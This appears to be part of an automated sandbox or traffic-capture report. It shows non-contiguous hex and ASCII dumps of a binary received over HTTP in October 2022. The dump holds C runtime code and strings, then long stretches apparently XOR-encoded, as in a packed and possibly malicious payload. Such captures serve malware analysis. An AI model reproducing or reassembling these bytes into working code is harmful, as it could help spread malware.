                                                                                                                                  2022-10-17 20:07:17 UTC779INData Raw: 83 c2 14 89 54 24 08 89 54 24 04 89 14 24 e8 ba ed ff ff 83 c4 10 dd 44 24 04 c3 f3 0f 7e 44 24 04 66 0f f3 ca 66 0f 28 d8 66 0f c2 c1 06 3d ff 03 00 00 7c 25 3d 32 04 00 00 7f b0 66 0f 54 05 80 ec 42 00 f2 0f 58 c8 66 0f d6 4c 24 04 dd 44 24 04 c3 dd 05 c0 ec 42 00 c3 66 0f c2 1d a0 ec 42 00 06 66 0f 54 1d 80 ec 42 00 66 0f d6 5c 24 04 dd 44 24 04 c3 33 c0 50 50 6a 03 50 6a 03 68 00 00 00 40 68 c8 ec 42 00 ff 15 74 40 42 00 a3 60 2a 43 00 c3 8b 0d 60 2a 43 00 83 f9 fe 75 0b e8 d1 ff ff ff 8b 0d 60 2a 43 00 33 c0 83 f9 ff 0f 95 c0 c3 a1 60 2a 43 00 83 f8 ff 74 0c 83 f8 fe 74 07 50 ff 15 30 40 42 00 c3 8b ff 55 8b ec 56 6a 00 ff 75 10 ff 75 0c ff 75 08 ff 35 60 2a 43 00 ff 15 30 41 42 00 8b f0 85 f6 75 2d ff 15 80 40 42 00 83 f8 06 75 22 e8 b6 ff ff ff e8
                                                                                                                                  Data Ascii: T$T$$D$~D$ff(f=|%=2fTBXfL$D$BfBfTBf\$D$3PPjPjh@hBt@B`*C`*Cu`*C3`*CttP0@BUVjuuu5`*C0ABu-@Bu"
                                                                                                                                  2022-10-17 20:07:17 UTC787INData Raw: 00 01 00 00 00 28 00 00 00 06 00 00 00 16 00 00 00 7b 00 00 00 02 00 00 00 57 00 00 00 16 00 00 00 21 00 00 00 27 00 00 00 d4 00 00 00 27 00 00 00 83 00 00 00 16 00 00 00 e6 03 00 00 0d 00 00 00 08 00 00 00 0c 00 00 00 15 00 00 00 0b 00 00 00 11 00 00 00 12 00 00 00 32 00 00 00 81 00 00 00 6e 00 00 00 05 00 00 00 61 09 00 00 10 00 00 00 e3 03 00 00 69 00 00 00 0e 00 00 00 0c 00 00 00 03 00 00 00 02 00 00 00 1e 00 00 00 05 00 00 00 29 11 00 00 16 00 00 00 d5 04 00 00 0b 00 00 00 19 00 00 00 05 00 00 00 20 00 00 00 0d 00 00 00 04 00 00 00 18 00 00 00 1d 00 00 00 05 00 00 00 13 00 00 00 0d 00 00 00 1d 27 00 00 0d 00 00 00 40 27 00 00 64 00 00 00 41 27 00 00 65 00 00 00 3f 27 00 00 66 00 00 00 35 27 00 00 67 00 00 00 19 27 00 00 09 00 00 00 45 27 00 00 6a 00
                                                                                                                                  Data Ascii: ({W!''2nai) '@'dA'e?'f5'g'E'j
                                                                                                                                  2022-10-17 20:07:17 UTC795INData Raw: 97 98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f 40 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 5b 5c 5d 5e 5f 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95
                                                                                                                                  Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
                                                                                                                                  2022-10-17 20:07:17 UTC803INData Raw: 00 03 00 00 00 10 00 00 00 47 65 74 55 73 65 72 44 65 66 61 75 6c 74 4c 6f 63 61 6c 65 4e 61 6d 65 00 00 00 00 07 00 00 00 10 00 00 00 03 00 00 00 10 00 00 00 49 73 56 61 6c 69 64 4c 6f 63 61 6c 65 4e 61 6d 65 00 00 00 03 00 00 00 10 00 00 00 4c 43 4d 61 70 53 74 72 69 6e 67 45 78 00 00 00 04 00 00 00 10 00 00 00 4c 43 49 44 54 6f 4c 6f 63 61 6c 65 4e 61 6d 65 00 00 00 00 03 00 00 00 10 00 00 00 4c 6f 63 61 6c 65 4e 61 6d 65 54 6f 4c 43 49 44 00 00 00 00 12 00 00 00 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68 6f 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 43 00 00 00 00 00 00 38 43 ff ff ff ff ff ff 0f 00 ff ff ff ff ff ff 0f 00 00 00 00 00 00 00 f0 3f 00 00 00 00 00 00 f0 3f ff ff ff ff ff ff
                                                                                                                                  Data Ascii: GetUserDefaultLocaleNameIsValidLocaleNameLCMapStringExLCIDToLocaleNameLocaleNameToLCIDAppPolicyGetProcessTerminationMethod8C8C??
                                                                                                                                  2022-10-17 20:07:17 UTC811INData Raw: 00 2d 00 4d 00 4f 00 00 00 64 00 65 00 2d 00 4c 00 49 00 00 00 65 00 6e 00 2d 00 4e 00 5a 00 00 00 65 00 73 00 2d 00 43 00 52 00 00 00 66 00 72 00 2d 00 4c 00 55 00 00 00 62 00 73 00 2d 00 42 00 41 00 2d 00 4c 00 61 00 74 00 6e 00 00 00 00 00 73 00 6d 00 6a 00 2d 00 53 00 45 00 00 00 00 00 61 00 72 00 2d 00 4d 00 41 00 00 00 65 00 6e 00 2d 00 49 00 45 00 00 00 65 00 73 00 2d 00 50 00 41 00 00 00 66 00 72 00 2d 00 4d 00 43 00 00 00 73 00 72 00 2d 00 42 00 41 00 2d 00 4c 00 61 00 74 00 6e 00 00 00 00 00 73 00 6d 00 61 00 2d 00 4e 00 4f 00 00 00 00 00 61 00 72 00 2d 00 54 00 4e 00 00 00 65 00 6e 00 2d 00 5a 00 41 00 00 00 65 00 73 00 2d 00 44 00 4f 00 00 00 73 00 72 00 2d 00 42 00 41 00 2d 00 43 00 79 00 72 00 6c 00 00 00 00 00 73 00 6d 00 61 00 2d 00 53 00
                                                                                                                                  Data Ascii: -MOde-LIen-NZes-CRfr-LUbs-BA-Latnsmj-SEar-MAen-IEes-PAfr-MCsr-BA-Latnsma-NOar-TNen-ZAes-DOsr-BA-Cyrlsma-S
                                                                                                                                  2022-10-17 20:07:17 UTC818INData Raw: 3f 00 00 00 00 40 d9 ef 3f 00 00 00 00 40 d8 ef 3f 00 00 00 00 40 d7 ef 3f 00 00 00 00 40 d6 ef 3f 00 00 00 00 40 d5 ef 3f 00 00 00 00 40 d4 ef 3f 00 00 00 00 40 d3 ef 3f 00 00 00 00 80 d2 ef 3f 00 00 00 00 80 d1 ef 3f 00 00 00 00 80 d0 ef 3f 00 00 00 00 80 cf ef 3f 00 00 00 00 80 ce ef 3f 00 00 00 00 80 cd ef 3f 00 00 00 00 80 cc ef 3f 00 00 00 00 80 cb ef 3f 00 00 00 00 80 ca ef 3f 00 00 00 00 80 c9 ef 3f 00 00 00 00 80 c8 ef 3f 00 00 00 00 80 c7 ef 3f 00 00 00 00 80 c6 ef 3f 00 00 00 00 80 c5 ef 3f 00 00 00 00 80 c4 ef 3f 00 00 00 00 80 c3 ef 3f 00 00 00 00 80 c2 ef 3f 00 00 00 00 80 c1 ef 3f 00 00 00 00 00 10 f0 3f 00 00 00 00 c0 0f f0 3f 00 00 00 00 80 0f f0 3f 00 00 00 00 40 0f f0 3f 00 00 00 00 00 0f f0 3f 00 00 00 00 c0 0e f0 3f 00 00 00 00 80 0e
                                                                                                                                  Data Ascii: ?@?@?@?@?@?@?@??????????????????????@???
                                                                                                                                  2022-10-17 20:07:17 UTC826INData Raw: bf 71 d1 12 f9 df d1 33 bd 00 00 00 92 ec 3f 05 bf 3a 1a 91 52 ae a5 24 bd 00 00 00 40 ed df 04 bf dc 8e 9f 24 0f 05 3d bd 00 00 00 ec ed 7f 04 bf 0e 4b 92 dd 02 d1 27 bd 00 00 00 5c ee 3f 04 bf 81 d0 aa 7b 95 62 3e bd 00 00 00 02 ef df 03 bf a0 f2 24 45 ad 76 43 bd 00 00 00 a6 ef 7f 03 bf 49 e9 77 38 91 52 27 bd 00 00 00 46 f0 1f 03 bf 47 f8 5f 6a b2 2c 29 bd 00 00 00 e2 f0 bf 02 bf ae 2b 6a ec 42 da 44 bd 00 00 00 7c f1 5f 02 bf 0b 60 6b 05 e4 81 41 bd 00 00 00 12 f2 ff 01 bf 25 27 72 a7 0c 42 4c bd 00 00 00 a6 f2 9f 01 bf 09 bc 54 94 b9 1a 45 bd 00 00 00 06 f3 5f 01 bf 11 12 c6 fa 02 47 4f bd 00 00 00 96 f3 ff 00 bf e3 23 1e 69 bf cc 23 bd 00 00 00 20 f4 9f 00 bf 3b 8a de 5e d8 b7 48 bd 00 00 00 a8 f4 3f 00 bf 36 28 60 4a f9 94 4a bd 00 00 00 5c ea bf
                                                                                                                                  Data Ascii: q3?:R$@$=K'\?{b>$EvCIw8R'FG_j,)+jBD|_`kA%'rBLTE_GO#i# ;^H?6(`JJ\
                                                                                                                                  2022-10-17 20:07:17 UTC834INData Raw: 00 80 fe 42 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 20 ff 42 00 f8 52 46 00 04 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 a8 ff 42 00 70 01 43 00 74 ff 42 00 cc fe 42 00 80 fe 42 00 00 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 f0 01 43 00 00 00 00 00 01 00 00 00 04 00 00 00 24 02 43 00 94 53 46 00 02 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 04 ff 42 00 00 00 00 00 00 00 00 00 02 00 00 00 14 ff 42 00 00 00 00 00 00 00 00 00 01 00 00 00 50 ff 42 00 00 00 00 00 00 00 00 00 00 00 00 00 3c 53 46 00 c0 00 43 00 00 00 00 00 00 00 00 00 00 00 00 00 78 53 46 00 4c 00 43 00 04 56 46 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 44 fe 42 00 00 00 00 00 00 00 00 00 03 00 00 00 80 fd 42 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: B BRF@BpCtBBBC$CSF@BBPB<SFCxSFLCVF@DBB
                                                                                                                                  2022-10-17 20:07:17 UTC842INData Raw: 64 46 69 72 73 74 46 69 6c 65 45 78 57 00 00 8f 01 46 69 6e 64 4e 65 78 74 46 69 6c 65 57 00 8f 03 49 73 56 61 6c 69 64 43 6f 64 65 50 61 67 65 00 b5 01 47 65 74 41 43 50 00 00 9a 02 47 65 74 4f 45 4d 43 50 00 00 3a 02 47 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 57 00 00 ad 01 46 72 65 65 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 74 72 69 6e 67 73 57 00 16 05 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 57 00 b7 02 47 65 74 50 72 6f 63 65 73 73 48 65 61 70 00 00 4e 05 53 65 74 53 74 64 48 61 6e 64 6c 65 00 00 51 03 48 65 61 70 53 69 7a 65 00 00 ce 00 43 72 65 61 74 65 46 69 6c 65 57 00 15 06 57 72 69 74 65 43 6f 6e 73 6f 6c 65 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 01 00
                                                                                                                                  Data Ascii: dFirstFileExWFindNextFileWIsValidCodePageGetACPGetOEMCP:GetEnvironmentStringsWFreeEnvironmentStringsWSetEnvironmentVariableWGetProcessHeapNSetStdHandleQHeapSizeCreateFileWWriteConsoleW
                                                                                                                                  2022-10-17 20:07:17 UTC850INData Raw: 05 db 30 5d 07 84 70 5d 77 a6 1c 5a 71 a5 5f 1c 77 ac 3a 55 18 97 30 5d 7d 81 8c 83 63 a4 45 40 77 ac 31 4e 73 bd 34 71 70 bd 34 32 4d ac 30 57 ab 72 33 7b a9 ac 36 77 77 ad 2c 5d 77 ae 30 69 77 e4 4c 5d 63 ac 30 5d 77 ac 30 5b 77 20 a2 5d 74 bd 30 5d 76 b7 00 58 77 fd 31 5d 77 a7 30 5d 66 df e0 5d 77 aa 3a 5f 18 f0 30 5d 7d c3 6e 5d 77 a6 3b 65 c3 ac 30 5d 70 c3 6f 5d 77 a6 44 43 77 ac 31 51 7f c3 50 5d 77 a6 42 52 76 ac 40 75 16 ac 30 57 5b a0 36 55 18 ce 30 5d 7d c3 fb 5d 77 aa 38 32 17 ac 30 57 05 b5 31 5d 07 84 51 5d 77 a6 1c 41 71 aa 5f 97 77 ac 36 2f 54 ad 30 2d 7f c3 52 5d 77 a6 18 3e 77 ac 3a 32 bc ac 30 5b 7f c3 50 5d 77 a6 42 7a 76 ac 40 75 16 ac 30 57 5b a0 36 55 18 ce 30 5d 7d c3 fd 5d 77 aa 38 32 17 ac 30 57 05 9d 31 5d 07 84 51 5d 77 a6 1c
                                                                                                                                  Data Ascii: 0]p]wZq_w:U0]}cE@w1Ns4qp42M0Wr3{6ww,]w0iwL]c0]w0[w ]t0]vXw1]w0]f]w:_0]}n]w;e0]po]wDCw1QP]wBRv@u0W[6U0]}]w820W1]Q]wAq_w6/T0-R]w>w:20[P]wBzv@u0W[6U0]}]w820W1]Q]w
                                                                                                                                  2022-10-17 20:07:17 UTC857INData Raw: 07 c3 d0 5d 77 aa 15 4b 18 4e 30 5d 71 c3 f2 5d 77 a6 22 59 5f 95 30 5d 7d 96 64 a2 88 53 ee 53 65 a8 ce 4b 71 ac 30 46 18 96 30 5d 7d 70 ee 5e 51 72 30 83 74 8a ee 5d 71 86 30 5d 77 ed 7c 5d 77 ae 30 5d 77 5c 30 5d 77 1f 30 5d 77 0f 31 5d 77 a2 30 5d 77 ac 30 5d 77 ac 30 5d 77 44 30 5d 77 67 30 5d 77 1f 31 5d 77 af 30 5d 77 bd 30 5d 76 ac 30 5d 77 aa 30 5d 77 1e 31 5d 77 14 31 5d 77 af 30 5d 77 bd 30 5d 76 b2 32 75 9f ac 30 5b 5d bf 00 5b 77 f1 30 5d 77 ac 30 5d 77 ae 33 78 5a aa 16 2e c3 ac 30 57 04 6f 30 5d 7d d1 36 5d 77 a8 32 59 6f 21 6a 5d 77 ad 15 4b 05 79 33 5d 07 0e 15 4a 5f 68 30 5d 7d 0e 27 32 38 ac 30 57 09 bb 31 5d 73 89 1d 4a 51 d2 26 5c 77 a8 ce 5b fd ad 30 5b 04 69 30 5d 7d 89 b0 4a 76 ac 34 75 7a ac 30 76 0a ab 30 5d 73 86 2e 5e 18 77 30
                                                                                                                                  Data Ascii: ]wKN0]q]w"Y_0]}dSSeKq0F0]}p^Qr0t]q0]w|]w0]w\0]w0]w1]w0]w0]w0]wD0]wg0]w1]w0]w0]v0]w0]w1]w1]w0]w0]v2u0[][w0]w0]w3xZ.0Wo0]}6]w2Yo!j]wKy3]J_h0]}'280W1]sJQ&\w[0[i0]}Jv4uz0v0]s.^w0
                                                                                                                                  2022-10-17 20:07:17 UTC865INData Raw: 7b 23 07 5d 77 ae 4b da 77 ac 34 75 14 ac 30 5b 5b bb 21 57 66 a0 bf 6a 77 ac 32 26 f0 ac 30 59 68 a1 5a 04 6f c6 6b 76 59 bd 3a 4c 7b 23 07 5d 77 ae 4b da 77 ac 34 42 7b c6 69 45 1d f7 1b 4a 75 d7 3a 5d 77 a8 21 57 66 a0 bf 6a 77 ac 32 26 f0 ac 30 59 a3 3d 5e 20 f1 ac 30 59 66 a7 21 55 66 a1 69 37 2f bb 5a 05 64 a7 21 51 60 f4 23 51 66 a7 21 54 48 9f cf a2 88 bd 3a 64 65 ae 30 5d 75 d7 20 5d 77 a8 37 55 2f 23 09 5d 77 ae 21 57 f9 c5 bd 07 77 ac 31 20 fc ac 30 59 61 bf 3e 4b 64 a3 08 83 76 ac 30 4c 7d bd 3f d2 40 ac 30 5f 0c 2b 30 5d 73 b3 39 37 49 d8 31 5d 77 bd 3a 4c 78 23 07 5d 77 ae 4b da 77 ac 34 75 14 ac 30 5b 4d a8 31 5d 77 ae 4b 56 77 ac 34 4a 1d 9f 6b 5f 0c bc 30 5d 73 ab 38 05 f8 95 30 5d 75 d7 bb 5d 77 a8 21 52 68 a0 bd 06 77 ac 31 78 a7 4b 30
                                                                                                                                  Data Ascii: {#]wKw4u0[[!Wfjw2&0YhZokvY:L{#]wKw4B{iEJu:]w!Wfjw2&0Y=^ 0Yf!Ufi7/Zd!Q`#Qf!TH:de0]u ]w7U/#]w!Ww1 0Ya>Kdv0L}?@0_+0]s97I1]w:Lx#]wKw4u0[M1]wKVw4Jk_0]s80]u]w!Rhw1xK0
                                                                                                                                  2022-10-17 20:07:17 UTC873INData Raw: 70 bd 39 32 4d ac 30 57 ab 72 33 7b a9 ac 38 4a 2f a0 38 5a f9 c5 0f 59 88 53 cf 83 74 8a ee 5d 71 86 30 5d 77 ed 3c 5c 77 ac 30 5d 77 0f 30 5d 77 fa 30 5d 77 55 30 5d 77 af 30 5d 77 bd 30 5d 76 ae 30 5d 77 34 30 5d 77 c3 30 5d 77 ab 31 5d 77 a0 30 5d 77 ac 30 5d 77 ae 30 5d 77 23 30 5d 77 2a 30 5d 77 b9 31 5d 77 a0 30 5d 77 ac 30 5d 77 ae 30 5d 77 2a 30 5d 77 31 30 5d 77 8f 31 5d 77 a0 30 5d 77 ac 30 5d 77 ac 30 5d 77 e7 30 5d 77 4a 30 5d 77 9d 31 5d 77 af 30 5d 77 bd 30 5d 76 ac 30 5d 77 4c 31 5d 77 fa 30 5d 77 9a 32 5d 77 af 30 5d 77 bd 30 5d 76 ae 30 5d 77 79 31 5d 77 c3 30 5d 77 e8 32 5d 77 a0 30 5d 77 ac 30 5d 77 ae 30 5d 77 60 31 5d 77 2a 30 5d 77 fe 32 5d 77 a0 30 5d 77 ac 30 5d 77 ae 30 5d 77 6f 31 5d 77 31 30 5d 77 cc 32 5d 77 a0 30 5d 77 ac 30
                                                                                                                                  Data Ascii: p92M0Wr3{8J/8ZYSt]q0]w<\w0]w0]w0]wU0]w0]w0]v0]w40]w0]w1]w0]w0]w0]w#0]w*0]w1]w0]w0]w0]w*0]w10]w1]w0]w0]w0]w0]wJ0]w1]w0]w0]v0]wL1]w0]w2]w0]w0]v0]wy1]w0]w2]w0]w0]w0]w`1]w*0]w2]w0]w0]w0]wo1]w10]w2]w0]w0
                                                                                                                                  2022-10-17 20:07:17 UTC881INData Raw: 77 e9 30 d8 77 dc 31 54 76 bc 30 8c 6b ac 30 10 76 2a 30 2e 76 a5 31 4d 77 b5 2a 5d 77 e1 31 d5 77 df 31 54 76 bc 30 40 6d ac 30 10 76 27 30 2e 76 2d 31 4d 77 09 1a 97 5d e9 30 d1 77 df 31 5d 76 ac 30 f6 63 ac 30 18 77 20 30 28 76 af 31 4d 77 18 32 5d 77 e9 30 b2 77 d9 31 5e 56 bc 30 c9 6b ac 30 18 77 5c 30 21 76 af 11 4d 77 38 2c 5d 77 e9 30 a5 77 29 31 de 76 bc 30 e5 74 ac 30 18 77 56 30 d5 76 2f 31 4d 77 14 33 5d 77 e9 30 a0 77 24 31 5e 56 bc 30 c9 6b ac 30 18 77 ba 31 d5 76 af 31 4d 77 c8 33 5d 77 e9 30 44 76 20 31 de 76 bc 30 45 76 ac 30 18 77 b6 31 d2 76 af 11 4d 77 38 2c 5d 77 e9 30 46 76 23 31 5e 76 bc 30 e9 75 ac 30 18 77 b1 31 cf 76 af 11 4d 77 38 2c 5d 77 e9 30 43 76 38 31 5e 76 ac 30 f0 72 ac 30 90 77 8d 31 c5 76 af 31 5d 77 1d 38 5d 77 61 30
                                                                                                                                  Data Ascii: w0w1Tv0k0v*0.v1Mw*]w1w1Tv0@m0v'0.v-1Mw]0w1]v0c0w 0(v1Mw2]w0w1^V0k0w\0!vMw8,]w0w)1v0t0wV0v/1Mw3]w0w$1^V0k0w1v1Mw3]w0Dv 1v0Ev0w1vMw8,]w0Fv#1^v0u0w1vMw8,]w0Cv81^v0r0w1v1]w8]wa0
                                                                                                                                  2022-10-17 20:07:17 UTC889INData Raw: 73 0b 28 03 76 5b 91 5d 77 ac 30 cc 6f 49 00 4b 62 f2 31 5e d5 ac 30 5d 77 2a 28 82 47 ad 30 03 76 a7 92 5d 77 ac 30 de 77 3f 32 ec 6f f2 31 4e d5 ac 30 5d 77 2f 30 09 7f 1a 28 02 76 b2 92 5d 77 ac 30 de 77 60 3c eb 6f cc 31 74 d5 ac 30 5d 77 2f 30 6c 67 1a 28 3c 76 98 92 5d 77 ac 30 de 77 2b 23 9c 6f ce 31 62 d5 ac 30 5d 77 2f 30 32 77 60 28 3e 76 e6 92 5d 77 ac 30 de 77 9c 36 8a 6f c8 31 08 d5 ac 30 5d 77 3d 28 b8 47 ba 25 38 76 cd 92 5d 77 ac 30 db 6f 73 00 5c 77 c9 31 34 d5 ac 30 5d 77 2f 30 ce 75 1d 28 38 76 dd 92 5d 77 ac 30 cc 6f 49 00 4b 62 ca 31 20 d5 ac 30 5d 77 2a 28 82 47 ad 30 3b 76 29 92 5d 77 ac 30 de 77 8f 33 bf 6f ca 31 ef d5 ac 30 5d 77 2f 30 65 74 1d 28 3a 76 16 92 5d 77 ac 30 db 6f 73 00 5c 77 c4 31 9f d5 ac 30 5d 77 2f 30 f6 74 41 28
                                                                                                                                  Data Ascii: s(v[]w0oIKb1^0]w*(G0v]w0w?2o1N0]w/0(v]w0w`<o1t0]w/0lg(<v]w0w+#o1b0]w/02w`(>v]w0w6o10]w=(G%8v]w0os\w140]w/0u(8v]w0oIKb1 0]w*(G0;v)]w0w3o10]w/0et(:v]w0os\w10]w/0tA(
                                                                                                                                  2022-10-17 20:07:17 UTC897INData Raw: 77 03 20 dd 61 d7 30 f2 67 0c 26 26 77 03 20 9d 61 d7 30 f2 67 4c 26 26 77 03 20 5d 60 d7 30 f2 67 8c 27 26 77 03 20 1d 60 d7 30 f2 67 cc 27 26 77 03 20 dd 60 d7 30 f2 67 0c 27 26 77 03 20 9d 60 d7 30 f2 67 4c 27 26 77 03 20 5d 6f d7 30 f2 67 8c 28 26 77 03 20 1d 6f d7 30 f2 67 cc 28 26 77 03 20 dd 6f d7 30 f2 67 0c 28 26 77 03 20 9d 6f d7 30 f2 67 4c 28 26 77 03 20 5d 6e d7 30 f2 67 ec 29 26 77 03 20 3d 6e d7 30 f2 67 2c 29 26 77 03 20 fd 6e d7 30 f2 67 6c 29 26 77 03 20 bd 6e d7 30 f2 67 68 2a d6 77 03 20 3d 6c d7 30 f2 67 2c 2b 26 77 03 20 fd 6c d7 30 f2 67 6c 2b 26 77 03 20 bd 6c d7 30 f2 67 ac 2c 26 77 03 20 7d 6b d7 30 f2 67 ec 2c 26 77 03 20 dd 6b d7 30 f2 67 0c 2c 26 77 03 20 7d 6a d7 30 f2 67 ec 2d 26 77 03 20 3d 6a d7 30 f2 67 2c 2d 26 77 03 20
                                                                                                                                  Data Ascii: w a0g&&w a0gL&&w ]`0g'&w `0g'&w `0g'&w `0gL'&w ]o0g(&w o0g(&w o0g(&w o0gL(&w ]n0g)&w =n0g,)&w n0gl)&w n0gh*w =l0g,+&w l0gl+&w l0g,&w }k0g,&w k0g,&w }j0g-&w =j0g,-&w
                                                                                                                                  2022-10-17 20:07:17 UTC904INData Raw: 36 9c 04 65 43 ac 6f 02 24 d8 51 29 1e cf 71 2f 05 cd 49 14 19 c5 44 09 0e dc 55 0e 1e d6 55 60 4e 98 30 6c 47 9b 06 1f 42 9f 01 68 41 e9 01 64 47 e9 09 1f 34 ee 75 6f 4f 9d 00 6c 41 9b 01 6f 31 9e 74 6e 31 9c 02 19 44 ee 04 5d 36 95 71 1b 47 9b 02 1e 44 9c 00 6b 40 ef 00 19 36 9f 03 65 45 99 73 6c 4f ee 03 6f 33 98 72 1e 46 9c 08 1b 4f ea 72 69 77 e8 04 5d 4b 92 09 02 28 9c 6f 69 77 90 79 39 46 92 52 02 28 9c 6f 69 77 e8 6f 69 77 90 0e 2d 28 f3 04 5d 31 d9 5e 3e 17 98 30 3a 12 d8 6f 14 13 98 30 2e 12 d8 6f 14 13 98 30 18 19 d8 59 29 0e 98 30 14 a7 18 04 5d 32 ee 02 19 35 98 05 6b 32 9c 74 6a 40 95 75 68 45 94 74 6c 43 9b 04 1b 36 99 05 1c 34 95 09 6d 42 99 71 68 32 94 01 68 77 9f 08 1b 43 9f 01 1c 42 98 09 69 46 9d 71 18 35 9f 02 65 46 9c 00 6b 4f ed 04
                                                                                                                                  Data Ascii: 6eCo$Q)q/IDUU`N0lGBhAdG4uoOlAo1tn1D]6qGDk@6eEslOo3rFOriw]K(oiwy9FR(oiwoiw-(]1^>0:o0.o0Y)0]25k2tj@uhEtlC64mBqh2hwCBiFq5eFkO
                                                                                                                                  2022-10-17 20:07:17 UTC912INData Raw: 28 ed 45 29 1f c9 5e 29 1e cf 51 29 1e c3 5e 5d 2f 99 00 64 24 c9 42 2b 1e cf 55 1e 12 de 44 34 11 c5 53 3c 03 c9 71 28 03 c4 55 33 03 c5 53 3c 03 c5 5f 33 77 cb 55 29 28 e0 5f 3e 16 d8 59 32 19 ac 63 24 04 d8 55 30 59 e2 55 29 59 e2 55 29 00 c3 42 36 3e c2 56 32 05 c1 51 29 1e c3 5e 5d 22 c2 59 3e 16 df 44 14 27 ed 54 39 05 c9 43 2e 3e c2 56 32 05 c1 51 29 1e c3 5e 5d 30 cd 44 38 00 cd 49 14 27 ed 54 39 05 c9 43 2e 3e c2 56 32 05 c1 51 29 1e c3 5e 5d 22 c2 51 2f 0e e3 40 38 05 cd 44 34 18 c2 30 1f 1e c2 51 2f 0e e3 40 38 05 cd 44 34 18 c2 30 2d 04 d6 79 30 07 c0 55 30 12 c2 44 3c 03 c5 5f 33 77 ff 49 2e 03 c9 5d 73 30 c0 5f 3f 16 c0 59 27 16 d8 59 32 19 ac 63 24 04 d8 55 30 59 fe 45 33 03 c5 5d 38 59 ff 55 2f 1e cd 5c 34 0d cd 44 34 18 c2 30 0e 0e df 44
                                                                                                                                  Data Ascii: (E)^)Q)^]/d$B+UD4S<q(U3S<_3wU)(_>Y2c$U0YU)YU)B6>V2Q)^]"Y>D'T9C.>V2Q)^]0D8I'T9C.>V2Q)^]"Q/@8D40Q/@8D40-y0U0D<_3wI.]s0_?Y'Y2c$U0YE3]8YU/\4D40D
                                                                                                                                  2022-10-17 20:07:17 UTC920INData Raw: 77 d9 30 31 77 cd 30 2f 77 e9 30 25 77 dc 30 2f 77 c9 30 2e 77 df 30 34 77 c3 30 33 77 df 30 2f 77 c3 30 3e 77 c9 30 2e 77 df 30 7d 77 fb 30 0e 77 d5 30 2e 77 d8 30 38 77 c1 30 73 77 f8 30 38 77 d4 30 29 77 82 30 0f 77 c9 30 3a 77 d9 30 31 77 cd 30 2f 77 e9 30 25 77 dc 30 2f 77 c9 30 2e 77 df 30 34 77 c3 30 33 77 df 30 35 77 c9 30 2f 77 c9 30 7d 77 ff 30 38 77 df 30 2e 77 ff 30 24 77 df 30 29 77 c9 30 30 77 82 30 09 77 c9 30 25 77 d8 30 73 77 fe 30 38 77 cb 30 28 77 c0 30 3c 77 de 30 18 77 d4 30 2d 77 de 30 38 77 df 30 2e 77 c5 30 32 77 c2 30 2e 77 c5 30 32 77 c2 30 14 77 c8 30 60 77 8b 30 5c 4a ff 30 24 77 df 30 29 77 c9 30 30 77 82 30 09 77 c9 30 25 77 d8 30 73 77 fe 30 38 77 cb 30 28 77 c0 30 3c 77 de 30 18 77 d4 30 2d 77 de 30 38 77 df 30 2e 77 c5 30
                                                                                                                                  Data Ascii: w01w0/w0%w0/w0.w04w03w0/w0>w0.w0}w0w0.w08w0sw08w0)w0w0:w01w0/w0%w0/w0.w04w03w05w0/w0}w08w0.w0$w0)w00w0w0%w0sw08w0(w0<w0w0-w08w0.w02w0.w02w0w0`w0\J0$w0)w00w0w0%w0sw08w0(w0<w0w0-w08w0.w0
                                                                                                                                  2022-10-17 20:07:17 UTC928INData Raw: 16 c1 55 2a 18 de 5b 19 1e df 40 31 16 d5 7e 3c 1a c9 20 73 39 e9 64 7d 31 de 51 30 12 db 5f 2f 1c 8c 04 52 76 ac 31 5d 23 a2 34 13 16 c1 55 5e 3e c8 01 52 76 ac 31 5d 23 a2 34 13 16 c1 55 5e 3e c8 02 52 76 ac 31 5d 23 a2 34 13 16 c1 55 5e 3e c8 03 7b 76 ac 32 5d 23 a2 34 13 16 c1 55 5a 32 c2 44 34 03 d5 08 09 79 a5 7e 3c 1a c9 43 2d 16 cf 55 5b 32 c2 44 34 03 d5 16 5c 77 ae 30 09 79 a8 7e 3c 1a c9 37 18 19 d8 59 29 0e 95 64 53 7e e2 51 30 12 df 40 3c 14 c9 36 18 19 d8 59 29 0e 8b 31 5d 75 ac 64 53 73 e2 51 30 12 a4 75 33 03 c5 44 24 46 9c 64 53 7e e2 51 30 12 df 40 3c 14 c9 36 18 19 d8 59 29 0e 8b 31 5d 75 ac 64 53 73 e2 51 30 12 a4 75 33 03 c5 44 24 46 9d 64 53 7e e2 51 30 12 df 40 3c 14 c9 